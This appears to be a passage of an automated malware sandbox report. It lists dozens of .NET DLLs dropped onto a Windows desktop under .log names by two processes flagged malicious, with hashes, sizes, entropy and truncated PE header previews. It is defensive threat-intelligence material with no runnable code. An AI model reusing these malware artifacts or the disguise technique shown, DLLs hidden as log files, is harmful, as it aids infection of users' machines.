Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cYXMozly.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cuiLHKPV.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cvPvVBnu.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dObMrONS.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dcBDaqCa.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dfuljGgw.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\dgbVxyFV.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dkrUwkwy.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\drJTdJeQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eLulMUIY.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\eMbVZMhw.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ecVtFGvr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ehScSkLt.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ejtNoRQz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fJtKXqkZ.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fXRNARLX.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fiPsZiXa.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\fuqEGhOs.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fzytxiEW.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\gAtVyfCt.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gVWkEyHr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\giAKkGeJ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\grWVOsjw.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\hLfttZpU.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
